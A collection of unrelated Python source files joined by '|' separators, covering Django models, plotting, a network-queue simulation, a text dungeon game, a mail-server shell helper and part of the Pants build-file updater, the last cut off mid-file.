            field=models.CharField(blank=True, choices=[('math', 'ریاضی'), ('natural', 'تجربی'), ('humanity', 'انسانی')], max_length=10, verbose_name='رشته'),
        ),
        migrations.AlterField(
            model_name='levelfield',
            name='level',
            field=models.CharField(choices=[('first', 'اول'), ('second', 'دوم'), ('third', 'سوم')], default='first', max_length=10, verbose_name='پایه'),
        ),
    ]
|
import pandas as pd
import matplotlib.pyplot as plt
# Raw string prevents backslash sequences in the Windows path from being
# interpreted as escapes.
airquality_df = pd.read_csv(r'E:\csvdhf5xlsxurlallfiles/airquality.csv')
print(airquality_df.head())
month = airquality_df['Month']
temperature = airquality_df['Temp']

# using axes(): two side-by-side axes. Fixes two bugs in the original:
# 1) `plt.plot(airquality_df, month, 'r')` passed the entire DataFrame as the
#    x values; the series itself is what should be plotted.
# 2) both axes used the same rectangle, so the second plot covered the first;
#    the second axes is shifted to the right half of the figure.
plt.axes([0.05, 0.05, 0.425, 0.9])
plt.plot(month, 'r')
plt.axes([0.525, 0.05, 0.425, 0.9])
plt.plot(temperature, 'b')
plt.show()

# using subplot(): same two series, stacked vertically.
plt.subplot(2, 1, 1)
plt.plot(month, 'r')
plt.subplot(2, 1, 2)
plt.plot(temperature, 'b')
plt.tight_layout()
plt.show()
|
# -*- coding:utf-8 _*-
"""
@author:Administrator
@file: main.py
@time: 2019/1/9
"""
from scrapy.cmdline import execute
# To resume a paused crawl, add e.g. `-s JOBDIR=crawls/trulia_state_county_zip-1`.
execute(["scrapy", "crawl", "realtor"])
|
# -*- coding: utf-8 -*-
# @Author : WangNing
# @Email : 3190193395@qq.com
# @File : static_variables.py
# @Software: PyCharm
import os
# Project root: two directory levels above this file.
PROJECT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Database configuration file.
DB_CONFIG = "{}/config/db_config.ini".format(PROJECT_PATH)
# Location of the test scripts.
SCRIPT_PATH = "{}/scripts".format(PROJECT_PATH)

if __name__ == '__main__':
    print(PROJECT_PATH)
    print(SCRIPT_PATH)
    print(DB_CONFIG)
|
#!/usr/bin/env python
"""
Name: Rafael Broseghini
Implementation of a 'Soccer Tournament' using data
from the LCMS website stored in a text file.
"""
import random
from team import Team
from tournament import Tournament
from roster import Roster
from player import Player
class Facility:
    """Base class for a physical facility; stores only its size description."""

    def __init__(self, size):
        self._size = size  # free-form string, e.g. "30x50 yards "
# Field is a Facility.
class Field(Facility):
    """A playing field: a Facility with a playing surface."""

    def __init__(self, size, surface):
        super().__init__(size)
        self._surface = surface

    def __str__(self):
        # `_size` already carries its own trailing space.
        return f"{self._size}{self._surface} fields."
def main():
    """Build the roster, split it into teams, and announce the winner."""
    f = Field("30x50 yards ", "grass")
    all_players = Roster()
    tourney = Tournament()
    divided_teams = tourney.make_teams(all_players.roster)
    winner = tourney.compute_winner()
    print("These are the teams:\n")
    for team in divided_teams:
        print("{}\n".format(team))
    print("The winner is: \033[1;32m{}\033[0m".format(winner))
# Script entry point.
if __name__ == "__main__":
    main()
|
"""
This module extra functions/shortcuts to communicate with the system
(executing commands, etc.)
"""
import inspect
import os
import pwd
import re
import subprocess
from django.conf import settings
from django.utils.encoding import force_str
def exec_cmd(cmd, sudo_user=None, pinput=None, capture_output=True, **kwargs):
    """Execute a shell command.

    Run a command using the current user. Set :keyword:`sudo_user` if
    you need different privileges.

    NOTE(review): the command always runs with ``shell=True`` and
    ``sudo_user`` is interpolated directly into the command line, so callers
    must never pass untrusted input here.

    :param str cmd: the command to execute
    :param str sudo_user: a valid system username
    :param str pinput: data to send to process's stdin
    :param bool capture_output: capture process output or not
    :rtype: tuple
    :return: return code, command output (``None`` when not captured)
    """
    if sudo_user is not None:
        cmd = "sudo -u %s %s" % (sudo_user, cmd)
    kwargs["shell"] = True
    if pinput is not None:
        kwargs["stdin"] = subprocess.PIPE
    if capture_output:
        # Merge stderr into stdout so the caller gets a single stream.
        kwargs.update(stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    process = subprocess.Popen(cmd, **kwargs)
    if pinput or capture_output:
        # communicate() also waits for the process to finish.
        c_args = [pinput] if pinput is not None else []
        output = process.communicate(*c_args)[0]
    else:
        output = None
    process.wait()
    return process.returncode, output
def doveadm_cmd(params, pinput=None, capture_output=True, **kwargs):
    """Execute doveadm command.

    Run doveadm command using the current user. Set :keyword:`sudo_user` if
    you need different privileges.

    :param str params: the parameters to give to doveadm
    :param str sudo_user: a valid system username
    :param str pinput: data to send to process's stdin
    :param bool capture_output: capture process output or not
    :rtype: tuple
    :return: return code, command output
    :raises OSError: if the doveadm binary cannot be located
    """
    dpath = None
    # First try `which`; fall back to a configurable list of known locations.
    code, output = exec_cmd("which doveadm")
    if not code:
        dpath = force_str(output).strip()
    else:
        known_paths = getattr(
            settings, "DOVEADM_LOOKUP_PATH",
            ("/usr/bin/doveadm", "/usr/local/bin/doveadm")
        )
        for fpath in known_paths:
            if os.path.isfile(fpath) and os.access(fpath, os.X_OK):
                dpath = fpath
                break
    # Run as the dovecot user unless we already are that user.
    dovecot_user = getattr(settings, "DOVECOT_USER", "vmail")
    curuser = pwd.getpwuid(os.getuid()).pw_name
    sudo_user = dovecot_user if curuser != dovecot_user else None
    if dpath:
        return exec_cmd("{} {}".format(dpath, params),
                        sudo_user=sudo_user,
                        pinput=pinput,
                        capture_output=capture_output,
                        **kwargs)
    raise OSError("doveadm command not found")
def guess_extension_name():
    """Tries to guess the application's name by inspecting the stack.

    :return: a string or None
    """
    # Two frames up: the module that called our caller.
    caller_frame = inspect.stack()[2][0]
    modname = inspect.getmodule(caller_frame).__name__
    found = re.match(r"(?:modoboa\.)?(?:extensions\.)?([^\.$]+)", modname)
    return found.group(1) if found is not None else None
|
#encoding: utf-8
def permutaciones(lista):
    """Return every permutation of `lista` (naive recursive version)."""
    if not lista:
        return [[]]
    resultado = []
    for parcial in permutaciones(lista[1:]):
        resultado.extend(inserta_multiple(lista[0], parcial))
    return resultado
def permutaciones_tr(lista, res):
    """Tail-recursive permutations: `res` accumulates partial results."""
    if not lista:
        return res
    if not res:
        siguiente = [lista[0]]
    else:
        siguiente = inserta_multiple_tr(lista[0], res)
    return permutaciones_tr(lista[1:], siguiente)
def inserta_multiple_tr(x, lista):
    """Insert `x` at every position of every permutation in `lista`."""
    if len(lista) > 1:
        res = []
        for item in lista:
            res.extend(inserta_multiple(x, item))
        return res
    # Single-element accumulator: treat it as one permutation.
    return inserta_multiple(x, lista)
def inserta(x, lista, i):
    """Return a new list equal to `lista` with `x` inserted at index `i`."""
    copia = list(lista)
    copia.insert(i, x)
    return copia
def inserta_multiple(x, lista):
    """Return all lists made by inserting `x` at each position of `lista`."""
    return [inserta(x, lista, i) for i in range(len(lista) + 1)]
print permutaciones_tr([1,2,3,4],[])
|
from kivy.app import App
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.widget import Widget
from kivy.core.window import Window
from gui.Header import Header
# NOTE(review): placeholder class, not referenced anywhere in this module —
# confirm whether it is used from .kv files or can be removed.
class State:
    pass
class MainWidget(Widget):
    """Root widget of the application."""

    # Reference design resolution.
    base_w = 640
    base_h = 480
    # Name of the currently shown page (Kivy observable property).
    state = StringProperty("Home")
    # NOTE(review): created once at class-definition time, so every
    # MainWidget instance shares this Header — confirm this is intended.
    header = Header()

    def load_page(self, page):
        # Currently only logs the requested page name.
        print(page)
class MainApp(App):
    """Kivy application; builds the root widget."""

    def build(self):
        # Fixed window size for the target display.
        Window.size = (320, 240)
        return MainWidget()
# Application entry point.
if __name__ == '__main__':
    MainApp().run()
|
from django.db import models
from django.db.models import *
# Create your models here.
class stock(models.Model):
    """A listed stock with its price, concept and industry metadata."""

    stock_id = CharField(max_length=6, verbose_name='股票代码', unique=True)
    stock_name = CharField(max_length=32, verbose_name='股票简称')
    stock_price = DecimalField(max_digits=10, decimal_places=2, verbose_name='股票现价(元)')
    stock_increase = DecimalField(max_digits=10, decimal_places=2, verbose_name='股票涨幅(%)')
    stock_concept = CharField(max_length=1024, verbose_name='概念解析')
    # Fix: `max_length` is not a valid IntegerField option (Django ignores it
    # and newer versions reject it with a system-check error).
    stock_concept_num = IntegerField(verbose_name='所属概念数量')
    stock_market_value = CharField(max_length=16, verbose_name='市值(亿)')
    stock_industry = CharField(max_length=32, verbose_name='所属行业')

    class Meta:
        db_table = 'stock'

    def __str__(self):
        return '{0}_{1}'.format(self.stock_id, self.stock_name)
class account(models.Model):
    """A user's trading account, including bank and identity details."""

    # Fix (here and below): `max_length` is not a valid IntegerField option;
    # Django ignores it and newer versions reject it with a system-check error.
    user_id = models.IntegerField(verbose_name='用户Id', unique=True)
    name = models.CharField(max_length=11, verbose_name='姓名')
    id_card = models.CharField(max_length=18, verbose_name='身份证号', unique=True)
    bank_id = models.IntegerField(verbose_name='所属银行')
    bank_no = models.CharField(max_length=20, verbose_name='银行卡号')
    addr = models.CharField(max_length=1024, verbose_name='居住地址', default='')
    is_opened = models.IntegerField(verbose_name='是否开户', default=0)
    created_time = models.DateTimeField(auto_now_add=True)
    updated_time = models.DateTimeField(auto_now=True)

    class Meta:
        db_table = 'account'

    def __str__(self):
        return '%s_%s' % (self.name, self.id_card)
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
import math
import random
import gc
import platform
# Fixed seed for reproducible simulation runs.
np.random.seed(123)
sysstr = platform.system()
print(sysstr)
# Fix: the original imported the queue module only on Windows (py3 `queue`)
# or Darwin (py2 `Queue`), so any other OS (e.g. Linux) hit a NameError the
# first time `Queue.Queue` was used below. Select by Python version instead.
try:
    import queue as Queue  # Python 3
except ImportError:
    import Queue  # Python 2 fallback
# --- Simulation state (module-level globals, two links indexed 0 and 1) ---
qm = [0 for col in range(2)]  # per-link packet queues (replaced by Queue objects below)
Ym = [0 for col in range(2)]  # per-link virtual queues driving admission control
count = 50000  # number of simulated time slots
V = 1000  # utility/backlog trade-off parameter in the rate search
k = [1.0, 1.0]  # per-link delay weights used when logging HOL delay
# alpha = 10000.0
Rm = [0 for col in range(2)]  # per-link admission flag (1 = accept arrivals this slot)
alp = 0.9
for n in range(0, 2):
    qm[n] = Queue.Queue(maxsize=count)
maxvalue = 0.0  # objective value of the current candidate rate pair
max_last = 0.0  # best objective value seen so far in the search
r_keep = [0.0 for col in range(2)]  # best rate pair found by the grid search
r = [0.0 for col in range(2)]  # candidate rate pair being evaluated
channel_lambda = [0.3, 0.6]  # per-link channel ON probabilities
arrival_lambda = [0.5, 0.7]  # NOTE(review): only deleted at the end, never read — confirm
channel = [0 for col in range(2)]  # sampled channel state per link (0/1)
schedule = -1  # index of the link scheduled in the current slot
delay_every_step = [[0 for col in range(count)] for row in range(2)]  # HOL-delay trace per link
tran_count = [0 for col in range(2)]  # completed transmissions per link
arrival = [0 for col in range(2)]  # admitted arrivals per link
max_delay = [0 for col in range(2)]  # worst observed per-packet delay per link
def Channel():
    """Sample each link's ON/OFF state into the global `channel` list."""
    for n in range(0, 2):
        # Bernoulli draw with the link's ON probability.
        tmp = np.random.binomial(1, channel_lambda[n], 1)
        channel[n] = tmp[0]
def Arrival(i):
    """Admit one packet (timestamped with slot `i`) to each link whose
    admission flag Rm[m] is set and whose queue is not full."""
    for m in range(0, 2):
        if Rm[m] == 1 and qm[m].full() is False:
            # The queue stores arrival slots so delays can be computed later.
            qm[m].put(i)
            arrival[m] += 1
# def Clear():
#     for m in range(0, 2):
#         while qm[m].empty() is False:
#             qm[m].get()

# Main simulation loop: one iteration per time slot.
for i in range(0, count):
    # Step 1: grid-search (step 0.025) the admission-rate pair r maximizing
    # V * (log utility) minus the virtual-queue penalty Ym . r.
    maxvalue = -100000000.0
    max_last = -100000000.0
    for m in range(0, 2):
        r_keep[m] = 0.0
    r[0] = -1.0
    while r[0] <= 1.0:
        r[1] = -1.0
        while r[1] <= 1.0 and (r[0] + r[1]) <= 2.0:
            # Utility is linear for negative rates, log(1 + r) otherwise.
            if r[0] < 0:
                tmp1 = r[0]
            else:
                tmp1 = math.log(1 + r[0])
            if r[1] < 0:
                tmp2 = r[1]
            else:
                tmp2 = math.log(1 + r[1])
            tmp3 = V * (tmp1 + tmp2)
            tmp4 = Ym[0] * r[0] + Ym[1] * r[1]
            maxvalue = tmp3 - tmp4
            if maxvalue > max_last:
                max_last = maxvalue
                r_keep[0] = r[0]
                r_keep[1] = r[1]
            r[1] += 0.025
        r[0] += 0.025
    # Step 2: sample channels, then schedule the link with the larger
    # backlog-weighted channel value; break ties uniformly at random.
    Channel()
    if qm[0].empty() is False:
        tmp1 = qm[0].qsize() * channel[0]
        # tmp1 = (i - qm[0].queue[0]) * channel[0]
    else:
        tmp1 = 0
    if qm[1].empty() is False:
        tmp2 = qm[1].qsize() * channel[1]
        # tmp2 = (i - qm[1].queue[0]) * channel[1]
    else:
        tmp2 = 0
    if tmp1 > tmp2:
        schedule = 0
    elif tmp1 == tmp2:
        tmp = [0, 1]
        tmp3 = random.sample(tmp, 1)
        schedule = tmp3[0]
    else:
        schedule = 1
    # Step 3: admit new arrivals only on links whose real queue is shorter
    # than the virtual queue Ym.
    for m in range(0, 2):
        tmp1 = qm[m].qsize()
        tmp = float(tmp1)
        if tmp < Ym[m]:
            Rm[m] = 1
        else:
            Rm[m] = 0
    # Step 4: serve the scheduled link if its channel is ON; record the
    # delay (current slot minus arrival slot) of the departing packet.
    if qm[schedule].empty() is False and channel[schedule] == 1:
        tmp = i - qm[schedule].get()
        tran_count[schedule] += 1
        if tmp > max_delay[schedule]:
            max_delay[schedule] = tmp
    # print(qm[0].qsize(), qm[1].qsize())
    # Step 5: log each link's weighted head-of-line delay for plotting.
    for m in range(0, 2):
        if qm[m].empty() is False:
            delay_every_step[m][i] = (i - qm[m].queue[0]) * k[m]
        else:
            delay_every_step[m][i] = 0.0
    # Step 6: virtual-queue update (clipped at zero), then this slot's arrivals.
    for m in range(0, 2):
        tmp = Ym[m] - Rm[m] + r_keep[m]
        if tmp > 0:
            Ym[m] = tmp
        else:
            Ym[m] = 0
    Arrival(i)
print(arrival)

# Plot the recorded head-of-line delay trace for both links.
plt.figure(1)
x = np.linspace(0, count, count)
plt.xlabel('Time')
plt.ylabel('HOL delay')
plt.plot(x, delay_every_step[0], label='HOL delay, link 0, CL-MW')
plt.plot(x, delay_every_step[1], label='HOL delay, link 1, CL-MW')
plt.legend(loc='lower right')
plt.show()

# Drop the large simulation structures and collect before exit.
del count, V, maxvalue, max_last, r_keep, r
del channel, schedule, channel_lambda
del tran_count, arrival_lambda
gc.collect()
|
#!/usr/bin/python3
import urllib.request
import urllib.parse
#x = urllib.request.urlopen("http://www.baidu.com")
#print(x.read())
'''
#get method
url="http://music.baidu.com/search"
values={"key":"Ed Sheeran"}
data = urllib.parse.urlencode(values)
data = data.encode('utf-8')
req = urllib.request.Request(url,data)
resp = urllib.request.urlopen(req)
print(resp.read())
'''
try:
    url = "http://music.baidu.com"
    # Spoof a browser user agent; some sites reject the default urllib UA.
    headers = {}
    headers['User-Agent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0"
    req = urllib.request.Request(url, headers=headers)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    # Fix: `str(respData)` wrote the b'...' repr of the bytes, not the page
    # itself — decode before writing. `with` also guarantees the file is
    # flushed and closed even if the write fails.
    with open("html.txt", 'w', encoding='utf-8') as saveFile:
        saveFile.write(respData.decode('utf-8', errors='replace'))
except Exception as e:
    # Best-effort script: report the failure instead of crashing.
    print(str(e))
|
class rooms(object):
    """A dungeon room: a tile grid plus its doors, chests and print helper."""

    def __init__(self, layout, doorlist, chestlist, isloaded, yborder, xborder, comoprinter):
        self.layout = layout  # 2-D list of tile characters
        self.doorlist = doorlist
        self.chestlist = chestlist
        self.loaded = isloaded
        self.yborder = yborder  # max y index of the room
        self.xborder = xborder  # max x index of the room
        # NOTE(review): at the call site this receives the *result* of calling
        # the printer (None), not the printer function itself — confirm.
        self.comoprinter = comoprinter
class doors(object):
    """A door connecting two rooms at (r1x, r1y) and (r2x, r2y)."""

    def __init__(self, r1x, r1y, r2x, r2y, islocked):
        # Fix: the original assigned `self.rlx = rlx` (letter "l"), an
        # undefined name, which raised NameError on every construction;
        # `self.rly` likewise mixed up the attribute name.
        self.r1x = r1x
        self.r1y = r1y
        self.r2x = r2x
        self.r2y = r2y
        self.islocked = islocked
chestque = ""
class chest(object):
    """An openable chest placed in a room, holding a list of item names."""

    def __init__(self, room, y, x, things):
        self.room = room
        self.y = y
        self.x = x
        self.things = things  # items still inside the chest

    def chestplace(self):
        # Mark the chest's tile with "C".
        # NOTE(review): `self.roomnumber` is never assigned in this file, so
        # this looks like it raises AttributeError — perhaps
        # `self.room.layout` was intended; confirm.
        self.roomnumber[self.y][self.x] = "C"

    def openingchest(self):
        # Interactive loop: let the player take items until they are done.
        print self.things
        global chestque
        if self.things == []:
            aredone = 1
        else:
            aredone = 0
        passo = False
        tradedone = 0
        while aredone == 0:
            chestque = raw_input("What do you want?")
            passo = 0
            if chestque == "all":
                # Take everything at once.
                tradedone = 1
                global inv
                for ele in self.things:
                    print ele + "debug"
                    inv.append(ele)
                self.things = []
                print self.things
            elif chestque == "null":
                # Take nothing.
                tradedone = 1
            else:
                # Look for the named item and move it into the inventory.
                for i in self.things:
                    passo = False
                    print i + " debug"
                    if chestque == i:
                        tradedone = 1
                        inv.append(chestque)
                        self.things.remove(chestque)
                        print self.things
                    else:
                        pass
                if tradedone == 1:
                    pass
                else:
                    print "Not Found"
            if tradedone == 0:
                pass
            else:
                de = raw_input("Are you done? Yes or No?: ")
                if de == "No":
                    passo = True
                elif de == "Yes":
                    if passo == False:
                        print "Thanks for shopping!"
                        aredone = 1
                    else:
                        pass
                else:
                    print "Guess you're not done????"
                    print "Bye!"
# Place room 1's two chests and register them for lookup by coordinates.
# NOTE(review): `room1` is only defined near the bottom of this file, so as
# ordered these constructor calls raise NameError at import time — confirm
# the intended statement order.
chest1_4_4 = chest(room1, 4, 4, ["shirt", "apple", "stick", "banana"])
chest1_4_4.chestplace()
chest1_2_1 = chest(room1, 2, 1, ["flint", "iron", "coal"])
chest1_2_1.chestplace()
list_of_chests = [chest1_4_4, chest1_2_1]
def openchest(y, x):
    """Open the chest at grid position (y, x), then step the player back."""
    print "CHEST BOI"
    global list_of_chests
    for i in list_of_chests:
        if i.y == y and i.x == x:
            i.openingchest()
    global xcoord
    global ycoord
    rebound(y, x)
def rebound(yco, xco):
    """Move the player one tile away from (yco, xco) based on the global
    `user_input` key, redraw the tile as "G" and reprint the room.

    NOTE(review): reads the module-level `user_input`, `room` and
    `print_room`, which are not defined in this file — confirm they come
    from the game's main loop.
    """
    global ycoord
    global xcoord
    if user_input == "w":
        yco += 1
        ycoord += 1
        room[yco][xco] = "G"
        print_room(room)
    elif user_input == "s":
        yco -= 1
        ycoord -= 1
        room[yco][xco] = "G"
        print_room(room)
    elif user_input == "a":
        xco += 1
        xcoord += 1
        room[yco][xco] = "G"
        print_room(room)
    elif user_input == "d":
        xco -= 1
        xcoord -= 1
        room[yco][xco] = "G"
        print_room(room)
#The below block sets up room1's layout
# `proxy` is the module-level grid that roombuilding1() fills in.
# NOTE(review): a `global` statement at module level is a no-op — confirm.
global proxy
proxy = []
def roombuilding1(q):
    """Fill the global `proxy` with room 1's 7x7 layout and return it.

    NOTE(review): the parameter `q` is unused — confirm it can be dropped.
    """
    for x in range(0, 7):
        proxy.append(["#"] * 7)
    # Draw the border ("B") along the first and last row and column.
    nerds = [0, 6]
    for le in nerds:
        for i in range(0, 7):
            proxy[le][i] = "B"
            proxy[i][le] = "B"
    # Door tile (read back later as room1doors).
    proxy[3][6] = "D"
    # Interior wall column.
    proxy[1][2] = "W"
    proxy[2][2] = "W"
    proxy[3][2] = "W"
    proxy[4][2] = "W"
    return proxy
# Build room 1's grid and pull out its door tile.
room1setup = roombuilding1(8)
room1doors = room1setup[3][6]
# Fix: the original line here was the bare expression `room1chests`, which
# raised NameError. Define it (empty for now) so the `rooms(...)` call below
# can receive it; the actual chests live in `list_of_chests`.
room1chests = []
def room1printer(var):
    """Print the global `proxy` grid row by row (`var` is unused)."""
    global proxy
    for row in proxy:
        print " ".join(row)
# NOTE(review): `room1printer(8)` executes here (printing the room) and
# returns None, so `room1.comoprinter` holds None and the bare attribute
# access below is a no-op — confirm whether the function itself was meant
# to be stored and called later.
room1 = rooms(room1setup, room1doors, room1chests, True, 6, 6, room1printer(8))
room1.comoprinter
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import dataclasses
import logging
import os.path
import tokenize
from collections import defaultdict
from dataclasses import dataclass
from enum import Enum
from io import BytesIO
from typing import DefaultDict, cast
from colors import green, red
from pants.backend.build_files.fix.deprecations import renamed_fields_rules, renamed_targets_rules
from pants.backend.build_files.fix.deprecations.base import FixedBUILDFile
from pants.backend.build_files.fmt.black.register import BlackRequest
from pants.backend.build_files.fmt.yapf.register import YapfRequest
from pants.backend.python.goals import lockfile
from pants.backend.python.lint.black.rules import _run_black
from pants.backend.python.lint.black.subsystem import Black
from pants.backend.python.lint.yapf.rules import _run_yapf
from pants.backend.python.lint.yapf.subsystem import Yapf
from pants.backend.python.subsystems.python_tool_base import get_lockfile_interpreter_constraints
from pants.backend.python.util_rules import pex
from pants.base.specs import Specs
from pants.engine.console import Console
from pants.engine.engine_aware import EngineAwareParameter
from pants.engine.environment import EnvironmentName
from pants.engine.fs import (
CreateDigest,
Digest,
DigestContents,
FileContent,
PathGlobs,
Paths,
Snapshot,
SpecsPaths,
Workspace,
)
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.build_files import BuildFileOptions
from pants.engine.internals.parser import ParseError
from pants.engine.rules import Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.option.option_types import BoolOption, EnumOption
from pants.util.docutil import bin_name, doc_url
from pants.util.logging import LogLevel
from pants.util.memo import memoized
from pants.util.strutil import help_text, softwrap
logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------------------
# Generic goal
# ------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class RewrittenBuildFile:
    """Result of one rewriter pass over a single BUILD file."""

    path: str  # BUILD file path
    lines: tuple[str, ...]  # file content after the rewrite, split into lines
    change_descriptions: tuple[str, ...]  # human-readable summaries; empty if unchanged
class Formatter(Enum):
    """Which formatter handles BUILD files (see the `formatter` option below)."""

    YAPF = "yapf"
    BLACK = "black"
@union(in_scope_types=[EnvironmentName])
@dataclass(frozen=True)
class RewrittenBuildFileRequest(EngineAwareParameter):
    """Union base: a request for one rewriter pass over one BUILD file."""

    path: str
    lines: tuple[str, ...]
    # Excluded from equality so color settings don't affect memoization.
    colors_enabled: bool = dataclasses.field(compare=False)

    def debug_hint(self) -> str:
        return self.path

    def to_file_content(self) -> FileContent:
        lines = "\n".join(self.lines) + "\n"
        return FileContent(self.path, lines.encode("utf-8"))

    @memoized
    def tokenize(self) -> list[tokenize.TokenInfo]:
        # Cached: several fixers may tokenize the same request.
        _bytes_stream = BytesIO("\n".join(self.lines).encode("utf-8"))
        try:
            return list(tokenize.tokenize(_bytes_stream.readline))
        except tokenize.TokenError as e:
            raise ParseError(f"Failed to parse {self.path}: {e}")

    def red(self, s: str) -> str:
        # Apply ANSI color only when the console has colors enabled.
        return cast(str, red(s)) if self.colors_enabled else s

    def green(self, s: str) -> str:
        return cast(str, green(s)) if self.colors_enabled else s
class DeprecationFixerRequest(RewrittenBuildFileRequest):
    """A fixer for deprecations.

    These can be disabled by the user with `--no-fix-safe-deprecations`.
    """
class UpdateBuildFilesSubsystem(GoalSubsystem):
    """Options for the `update-build-files` goal."""

    name = "update-build-files"
    help = help_text(
        f"""
        Format and fix safe deprecations in BUILD files.
        This does not handle the full Pants upgrade. You must still manually change
        `pants_version` in `pants.toml` and you may need to manually address some deprecations.
        See {doc_url('upgrade-tips')} for upgrade tips.
        This goal is run without arguments. It will run over all BUILD files in your
        project.
        """
    )

    @classmethod
    def activated(cls, union_membership: UnionMembership) -> bool:
        # Only meaningful when at least one rewriter is registered.
        return RewrittenBuildFileRequest in union_membership

    # When true, report changes without writing them (exit code 1 if any).
    check = BoolOption(
        default=False,
        help=softwrap(
            """
            Do not write changes to disk, only write back what would change. Return code
            0 means there would be no changes, and 1 means that there would be.
            """
        ),
    )
    # When true, run the chosen formatter over BUILD files.
    fmt = BoolOption(
        default=True,
        help=softwrap(
            """
            Format BUILD files using Black or Yapf.
            Set `[black].args` / `[yapf].args`, `[black].config` / `[yapf].config` ,
            and `[black].config_discovery` / `[yapf].config_discovery` to change
            Black's or Yapf's behavior. Set
            `[black].interpreter_constraints` / `[yapf].interpreter_constraints`
            and `[python].interpreter_search_path` to change which interpreter is
            used to run the formatter.
            """
        ),
    )
    formatter = EnumOption(
        default=Formatter.BLACK,
        help="Which formatter Pants should use to format BUILD files.",
    )
    fix_safe_deprecations = BoolOption(
        default=True,
        help=softwrap(
            """
            Automatically fix deprecations, such as target type renames, that are safe
            because they do not change semantics.
            """
        ),
    )
class UpdateBuildFilesGoal(Goal):
    subsystem_cls = UpdateBuildFilesSubsystem
    # BUILD file rewriting only makes sense for the local workspace.
    environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY
@goal_rule(desc="Update all BUILD files", level=LogLevel.DEBUG)
async def update_build_files(
    update_build_files_subsystem: UpdateBuildFilesSubsystem,
    build_file_options: BuildFileOptions,
    console: Console,
    workspace: Workspace,
    union_membership: UnionMembership,
    specs: Specs,
) -> UpdateBuildFilesGoal:
    """Run every applicable BUILD-file rewriter over the specified files,
    then either write the results to disk or (with `--check`) report them."""
    if not specs:
        # Only warn when the user passed no specs at all; an empty result
        # from `--changed-since` is not user error.
        if not specs.includes.from_change_detection:
            logger.warning(
                softwrap(
                    f"""\
                    No arguments specified with `{bin_name()} update-build-files`, so the goal will
                    do nothing.
                    Instead, you should provide arguments like this:
                    * `{bin_name()} update-build-files ::` to run on everything
                    * `{bin_name()} update-build-files dir::` to run on `dir` and subdirs
                    * `{bin_name()} update-build-files dir` to run on `dir`
                    * `{bin_name()} update-build-files dir/BUILD` to run on that single BUILD file
                    * `{bin_name()} --changed-since=HEAD update-build-files` to run only on changed BUILD files
                    """
                )
            )
        return UpdateBuildFilesGoal(exit_code=0)
    all_build_file_paths, specs_paths = await MultiGet(
        Get(
            Paths,
            PathGlobs(
                globs=(
                    *(os.path.join("**", p) for p in build_file_options.patterns),
                    *(f"!{p}" for p in build_file_options.ignores),
                )
            ),
        ),
        Get(SpecsPaths, Specs, specs),
    )
    # Only rewrite BUILD files that the user's specs actually cover.
    specified_paths = set(specs_paths.files)
    specified_build_files = await Get(
        DigestContents,
        PathGlobs(fp for fp in all_build_file_paths.files if fp in specified_paths),
    )
    rewrite_request_classes = []
    for request in union_membership[RewrittenBuildFileRequest]:
        if issubclass(request, (FormatWithBlackRequest, FormatWithYapfRequest)):
            # XOR selects exactly the formatter matching the `formatter` option.
            is_chosen_formatter = issubclass(request, FormatWithBlackRequest) ^ (
                update_build_files_subsystem.formatter == Formatter.YAPF
            )
            if update_build_files_subsystem.fmt and is_chosen_formatter:
                rewrite_request_classes.append(request)
            else:
                continue
        # Deprecation fixers are skipped when --no-fix-safe-deprecations.
        if update_build_files_subsystem.fix_safe_deprecations or not issubclass(
            request, DeprecationFixerRequest
        ):
            rewrite_request_classes.append(request)
    build_file_to_lines = {
        build_file.path: tuple(build_file.content.decode("utf-8").splitlines())
        for build_file in specified_build_files
    }
    build_file_to_change_descriptions: DefaultDict[str, list[str]] = defaultdict(list)
    # Apply each rewriter in turn, feeding the previous rewriter's output in.
    for rewrite_request_cls in rewrite_request_classes:
        all_rewritten_files = await MultiGet(  # noqa: PNT30: this is inherently sequential
            Get(
                RewrittenBuildFile,
                RewrittenBuildFileRequest,
                rewrite_request_cls(build_file, lines, colors_enabled=console._use_colors),
            )
            for build_file, lines in build_file_to_lines.items()
        )
        for rewritten_file in all_rewritten_files:
            if not rewritten_file.change_descriptions:
                continue
            build_file_to_lines[rewritten_file.path] = rewritten_file.lines
            build_file_to_change_descriptions[rewritten_file.path].extend(
                rewritten_file.change_descriptions
            )
    changed_build_files = sorted(
        build_file
        for build_file, change_descriptions in build_file_to_change_descriptions.items()
        if change_descriptions
    )
    if not changed_build_files:
        msg = "No required changes to BUILD files found."
        if not update_build_files_subsystem.check:
            msg += softwrap(
                f"""
                However, there may still be deprecations that `update-build-files` doesn't know
                how to fix. See {doc_url('upgrade-tips')} for upgrade tips.
                """
            )
        logger.info(msg)
        return UpdateBuildFilesGoal(exit_code=0)
    # Only write to disk when not in --check mode.
    if not update_build_files_subsystem.check:
        result = await Get(
            Digest,
            CreateDigest(
                FileContent(
                    build_file, ("\n".join(build_file_to_lines[build_file]) + "\n").encode("utf-8")
                )
                for build_file in changed_build_files
            ),
        )
        workspace.write_digest(result)
    # Summarize what changed (or would change) per file.
    for build_file in changed_build_files:
        formatted_changes = "\n".join(
            f"  - {description}" for description in build_file_to_change_descriptions[build_file]
        )
        tense = "Would update" if update_build_files_subsystem.check else "Updated"
        console.print_stdout(f"{tense} {console.blue(build_file)}:\n{formatted_changes}")
    if update_build_files_subsystem.check:
        console.print_stdout(
            f"\nTo fix `update-build-files` failures, run `{bin_name()} update-build-files`."
        )
    return UpdateBuildFilesGoal(exit_code=1 if update_build_files_subsystem.check else 0)
# ------------------------------------------------------------------------------------------
# Yapf formatter fixer
# ------------------------------------------------------------------------------------------
class FormatWithYapfRequest(RewrittenBuildFileRequest):
    """Rewriter that formats a BUILD file with Yapf."""
@rule
